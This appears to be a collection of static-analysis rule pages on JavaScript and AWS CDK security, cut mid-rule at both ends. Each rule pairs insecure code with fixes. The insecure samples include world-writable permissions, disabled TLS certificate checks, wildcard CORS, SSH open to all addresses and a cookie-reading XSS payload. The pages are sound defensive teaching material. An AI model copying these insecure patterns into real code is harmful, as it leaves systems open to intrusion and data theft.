    • The file will be destroyed as soon as it is closed

Sensitive Code Example

const fs = require('fs');

let tmp_file = "/tmp/temporary_file"; // Sensitive
fs.readFile(tmp_file, 'utf8', function (err, data) {
  // ...
});
const fs = require('fs');

let tmp_dir = process.env.TMPDIR; // Sensitive
fs.readFile(tmp_dir + "/temporary_file", 'utf8', function (err, data) {
  // ...
});

Compliant Solution

const tmp = require('tmp');

const tmpobj = tmp.fileSync(); // Compliant

See

javascript:S1525

This rule is deprecated; use S4507 instead.

Why is this an issue?

The debugger statement can be placed anywhere in procedures to suspend execution. Using the debugger statement is similar to setting a breakpoint in the code. By definition such statement must absolutely be removed from the source code to prevent any unexpected behavior or added vulnerability to attacks in production.

Noncompliant code example

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
  // Wait for user to resume.
  debugger;
}

Compliant solution

for (i = 1; i<5; i++) {
  // Print i to the Output window.
  Debug.write("loop index is " + i);
}

Resources

javascript:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o777); // Sensitive
const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o777); // Sensitive
const fs = require('fs');
const fsPromises = fs.promises

async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o777); // Sensitive
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o000); // Sensitive

Compliant Solution

Node.js fs

const fs = require('fs');

fs.chmodSync("/tmp/fs", 0o770); // Compliant
const fs = require('fs');
const fsPromises = fs.promises;

fsPromises.chmod("/tmp/fsPromises", 0o770); // Compliant
const fs = require('fs');
const fsPromises = fs.promises

async function fileHandler() {
  let filehandle;
  try {
    filehandle = fsPromises.open('/tmp/fsPromises', 'r');
    filehandle.chmod(0o770); // Compliant
  } finally {
    if (filehandle !== undefined)
      filehandle.close();
  }
}

Node.js process.umask

const process = require('process');

process.umask(0o007); // Compliant

See

javascript:S1523

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS attack) and have a huge impact on an application’s security.

This rule raises issues on calls to eval and Function constructor. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

The rule also flags string literals starting with javascript: as the code passed in javascript: URLs is evaluated the same way as calls to eval or Function constructor.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (example: Security Managers in java, iframes and same-origin policy for javascript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.

Sensitive Code Example

let value = eval('obj.' + propName); // Sensitive
let func = Function('obj' + propName); // Sensitive
location.href = 'javascript:void(0)'; // Sensitive

Exceptions

This rule will not raise an issue when the argument of the eval or Function is a literal string as it is reasonably safe.

See

javascript:S4721

Arbitrary OS command injection vulnerabilities are more likely when a shell is spawned rather than a new process, indeed shell meta-chars can be used (when parameters are user-controlled for instance) to inject OS commands.

Ask Yourself Whether

  • OS command name or parameters are user-controlled.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use functions that don’t spawn a shell.

Sensitive Code Example

const cp = require('child_process');

// A shell will be spawn in these following cases:
cp.exec(cmd); // Sensitive
cp.execSync(cmd); // Sensitive

cp.spawn(cmd, { shell: true }); // Sensitive
cp.spawnSync(cmd, { shell: true }); // Sensitive
cp.execFile(cmd, { shell: true }); // Sensitive
cp.execFileSync(cmd, { shell: true }); // Sensitive

Compliant Solution

const cp = require('child_process');

cp.spawnSync("/usr/bin/file.exe", { shell: false }); // Compliant

See

javascript:S5148

A newly opened window having access back to the originating window could allow basic phishing attacks (the window.opener object is not null and thus window.opener.location can be set to a malicious website by the opened page).

For instance, an attacker can put a link (say: "http://example.com/mylink") on a popular website that changes, when opened, the original page to "http://example.com/fake_login". On "http://example.com/fake_login" there is a fake login page which could trick real users to enter their credentials.

Ask Yourself Whether

  • The application opens untrusted external URL.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Use noopener to prevent untrusted pages from abusing window.opener.

Note: In Chrome 88+, Firefox 79+ or Safari 12.1+ target=_blank on anchors implies rel=noopener which make the protection enabled by default.

Sensitive Code Example

window.open("https://example.com/dangerous");

Compliant Solution

window.open("https://example.com/dangerous", "WindowName", "noopener");

See

javascript:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Compliant Solution

ip = process.env.IP_ADDRESS; // Compliant

const net = require('net');
var client = new net.Socket();
client.connect(80, ip, function() {
  // ...
});

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID).
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the 2001:db8::/32 range, reserved for documentation purposes by RFC 3849

See

javascript:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allows publisher systems to fanout messages to a large number of subscriber systems. Amazon SNS allows to encrypt messages when they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

new Topic(this, 'exampleTopic'); // Sensitive

For aws_cdk.aws_sns.CfnTopic

import { Topic, CfnTopic } from 'aws-cdk-lib/aws-sns';

new CfnTopic(this, 'exampleCfnTopic'); // Sensitive

Compliant Solution

For aws_cdk.aws_sns.Topic

import { Topic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

new Topic(this, 'exampleTopic', {
    masterKey: encryptionKey
});

For aws_cdk.aws_sns.CfnTopic

import { CfnTopic } from 'aws-cdk-lib/aws-sns';

const encryptionKey = new Key(this, 'exampleKey', {
    enableKeyRotation: true,
});

cfnTopic = new CfnTopic(this, 'exampleCfnTopic', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

javascript:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(this, "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PUBLIC} // Sensitive
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: true, // Sensitive
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PUBLIC}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: true, // Sensitive
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPublic = new rds.CfnDBSubnetGroup(this, "publicSubnet", {
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "publicSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PUBLIC
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPublic.ref,
    publiclyAccessible: true, // Sensitive
    vpcSecurityGroups: [sg.securityGroupId]
})

Compliant Solution

For aws-cdk-lib.aws_ec2.Instance and similar constructs:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.Instance(
    this,
    "example", {
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    vpcSubnets: {subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}
})

For aws-cdk-lib.aws_ec2.CfnInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnInstance(this, "example", {
    instanceType: "t2.micro",
    imageId: "ami-0ea0f26a6d50850c5",
    networkInterfaces: [
        {
            deviceIndex: "0",
            associatePublicIpAddress: false,
            deleteOnTermination: true,
            subnetId: vpc.selectSubnets({subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS}).subnetIds[0]
        }
    ]
})

For aws-cdk-lib.aws_dms.CfnReplicationInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new dms.CfnReplicationInstance(
    this, "example", {
    replicationInstanceClass: "dms.t2.micro",
    allocatedStorage: 5,
    publiclyAccessible: false,
    replicationSubnetGroupIdentifier: subnetGroup.replicationSubnetGroupIdentifier,
    vpcSecurityGroupIds: [vpc.vpcDefaultSecurityGroup]
})

For aws-cdk-lib.aws_rds.CfnDBInstance:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const rdsSubnetGroupPrivate = new rds.CfnDBSubnetGroup(this, "example",{
    dbSubnetGroupDescription: "Subnets",
    dbSubnetGroupName: "privateSn",
    subnetIds: vpc.selectSubnets({
        subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS
    }).subnetIds
})

new rds.CfnDBInstance(this, "example", {
    engine: "postgres",
    masterUsername: "foobar",
    masterUserPassword: "12345678",
    dbInstanceClass: "db.r5.large",
    allocatedStorage: "200",
    iops: 1000,
    dbSubnetGroupName: rdsSubnetGroupPrivate.ref,
    publiclyAccessible: false,
    vpcSecurityGroups: [sg.securityGroupId]
})

See

javascript:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
// All uses of process.stdin are security-sensitive and should be reviewed

process.stdin.on('readable', () => {
	const chunk = process.stdin.read(); // Sensitive
	if (chunk !== null) {
		dosomething(chunk);
	}
});

const readline = require('readline');
readline.createInterface({
	input: process.stdin // Sensitive
}).on('line', (input) => {
	dosomething(input);
});

See

javascript:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue when on every program entry points (main methods) when command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

Sensitive Code Example

// The process object is a global that provides information about, and control over, the current Node.js process
var param = process.argv[2]; // Sensitive: check how the argument is used
console.log('Param: ' + param);

See

javascript:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from all IPv4"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup.addIngressRule(
    ec2.Peer.anyIpv4(), // Noncompliant
    ec2.Port.tcpRange(1, 1024)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "0.0.0.0/0", // Noncompliant
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroupIngress( // Noncompliant
    this,
    "ingress-all-ip-tcp-ssh", {
        ipProtocol: "tcp",
        cidrIp: "0.0.0.0/0",
        fromPort: 22,
        toPort: 22,
        groupId: securityGroup.attrGroupId
})

Compliant solution

For aws-cdk-lib.aws_ec2.Instance and other constructs that support a connections attribute:

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const instance = new ec2.Instance(this, "default-own-security-group",{
    instanceType: nanoT2,
    machineImage: ec2.MachineImage.latestAmazonLinux(),
    vpc: vpc,
    instanceName: "test-instance"
})

instance.connections.allowFrom(
    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    /*description*/ "Allows SSH from a trusted range"
)

For aws-cdk-lib.aws_ec2.SecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

const securityGroup3 = new ec2.SecurityGroup(this, "custom-security-group", {
    vpc: vpc
})

securityGroup3.addIngressRule(
    ec2.Peer.anyIpv4(),
    ec2.Port.tcpRange(1024, 1048)
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroup

import {aws_ec2 as ec2} from 'aws-cdk-lib'

new ec2.CfnSecurityGroup(
    this,
    "cfn-based-security-group", {
        groupDescription: "cfn based security group",
        groupName: "cfn-based-security-group",
        vpcId: vpc.vpcId,
        securityGroupIngress: [
            {
                ipProtocol: "6",
                cidrIp: "192.0.2.0/24",
                fromPort: 22,
                toPort: 22
            }
        ]
    }
)

For aws-cdk-lib.aws_ec2.CfnSecurityGroupIngress

new ec2.CfnSecurityGroupIngress(
    this,
    "ingress-all-ipv4-tcp-http", {
        ipProtocol: "6",
        cidrIp: "0.0.0.0/0",
        fromPort: 80,
        toPort: 80,
        groupId: securityGroup.attrGroupId
    }
)

Resources

Documentation

Standards

javascript:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Node.js

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by setting rejectUnauthorized to false. To enable validation set the value to true or do not set rejectUnauthorized at all to use the secure default value.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  rejectUnauthorized: false,
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
}); // Noncompliant
const tls = require('node:tls');

let options = {
    rejectUnauthorized: false,
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Noncompliant

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
    secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

javascript:S1442

This rule is deprecated; use S4507 instead.

Why is this an issue?

alert(...) as well as confirm(...) and prompt(...) can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed.

Noncompliant code example

if(unexpectedCondition) {
  alert("Unexpected Condition");
}

Resources

javascript:S4036

When executing an OS command and unless you specify the full path to the executable, then the locations in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the elements in PATH is a directory under his control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by not trusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

const cp = require('child_process');
cp.exec('file.exe'); // Sensitive

Compliant Solution

const cp = require('child_process');
cp.exec('/usr/bin/file.exe'); // Compliant

See

javascript:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independant OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example")
resource.addMethod(
    "GET",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.NONE // Sensitive
    }
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "no-auth", {
    apiId: api.ref,
    routeKey: "GET /no-auth",
    authorizationType: "NONE", // Sensitive
    target: exampleIntegration
})

Compliant Solution

For aws-cdk-lib.aws_apigateway.Resource:

import {aws_apigateway as apigateway} from "aws-cdk-lib"

const resource = api.root.addResource("example",{
    defaultMethodOptions:{
        authorizationType: apigateway.AuthorizationType.IAM
    }
})
resource.addMethod(
    "POST",
    new apigateway.HttpIntegration("https://example.org"),
    {
        authorizationType: apigateway.AuthorizationType.IAM
    }
)
resource.addMethod(  // authorizationType is inherited from the Resource's configured defaultMethodOptions
    "GET"
)

For aws-cdk-lib.aws_apigatewayv2.CfnRoute:

import {aws_apigatewayv2 as apigateway} from "aws-cdk-lib"

new apigateway.CfnRoute(this, "auth", {
    apiId: api.ref,
    routeKey: "POST /auth",
    authorizationType: "AWS_IAM",
    target: exampleIntegration
})

See

javascript:S5247

To reduce the risk of cross-site scripting attacks, templating systems, such as Twig, Django, Smarty, Groovy's template engine, allow configuration of automatic variable escaping before rendering templates. When escape occurs, characters that make sense to the browser (eg: <a>) will be transformed/replaced with escaped/sanitized values (eg: & lt;a& gt; ).

Auto-escaping is not a magic feature to annihilate all cross-site scripting attacks, it depends on the strategy applied and the context, for example a "html auto-escaping" strategy (which only transforms html characters into html entities) will not be relevant when variables are used in a html attribute because ':' character is not escaped and thus an attack as below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

mustache.js template engine:

let Mustache = require("mustache");

Mustache.escape = function(text) {return text;}; // Sensitive

let rendered = Mustache.render(template, { name: inputName });

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";

let template = Handlebars.compile(source, { noEscape: true }); // Sensitive

markdown-it markup language parser:

const markdownIt = require('markdown-it');
let md = markdownIt({
  html: true // Sensitive
});

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer(),
  sanitize: false // Sensitive
});

console.log(marked("# test <b>attack/b>"));

kramed markup language parser:

let kramed = require('kramed');

var options = {
  renderer: new kramed.Renderer({
    sanitize: false // Sensitive
  })
};

Compliant Solution

mustache.js template engine:

let Mustache = require("mustache");

let rendered = Mustache.render(template, { name: inputName }); // Compliant autoescaping is on by default

handlebars.js template engine:

const Handlebars = require('handlebars');

let source = "<p>attack {{name}}</p>";
let data = { "name": "<b>Alan</b>" };

let template = Handlebars.compile(source); // Compliant by default noEscape is set to false

markdown-it markup language parser:

let md = require('markdown-it')(); // Compliant by default html is set to false

let result = md.render('# <b>attack</b>');

marked markup language parser:

const marked = require('marked');

marked.setOptions({
  renderer: new marked.Renderer()
}); // Compliant by default sanitize is set to true

console.log(marked("# test <b>attack/b>"));

kramed markup language parser:

let kramed = require('kramed');

let options = {
  renderer: new kramed.Renderer({
    sanitize: true // Compliant
  })
};

console.log(kramed('Attack [xss?](javascript:alert("xss")).', options));

See

javascript:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example'); // Sensitive

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

new CfnQueue(this, 'example'); // Sensitive

Compliant Solution

For aws-cdk-lib.aws-sqs.Queue

import { Queue } from 'aws-cdk-lib/aws-sqs';

new Queue(this, 'example', {
    encryption: QueueEncryption.KMS_MANAGED
});

For aws-cdk-lib.aws-sqs.CfnQueue

import { CfnQueue } from 'aws-cdk-lib/aws-sqs';

const encryptionKey = new Key(this, 'example', {
    enableKeyRotation: true,
});

new CfnQueue(this, 'example', {
    kmsMasterKeyId: encryptionKey.keyId
});

See

javascript:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

nodejs http built-in module:

const http = require('http');
const srv = http.createServer((req, res) => {
  res.writeHead(200, { 'Access-Control-Allow-Origin': '*' }); // Sensitive
  res.end('ok');
});
srv.listen(3000);

Express.js framework with cors middleware:

const cors = require('cors');

let app1 = express();
app1.use(cors()); // Sensitive: by default origin is set to *

let corsOptions = {
  origin: '*' // Sensitive
};

let app2 = express();
app2.use(cors(corsOptions));

User-controlled origin:

function (req, res) {
  const origin = req.header('Origin');
  res.setHeader('Access-Control-Allow-Origin', origin); // Sensitive
};

Compliant Solution

nodejs http built-in module:

const http = require('http');
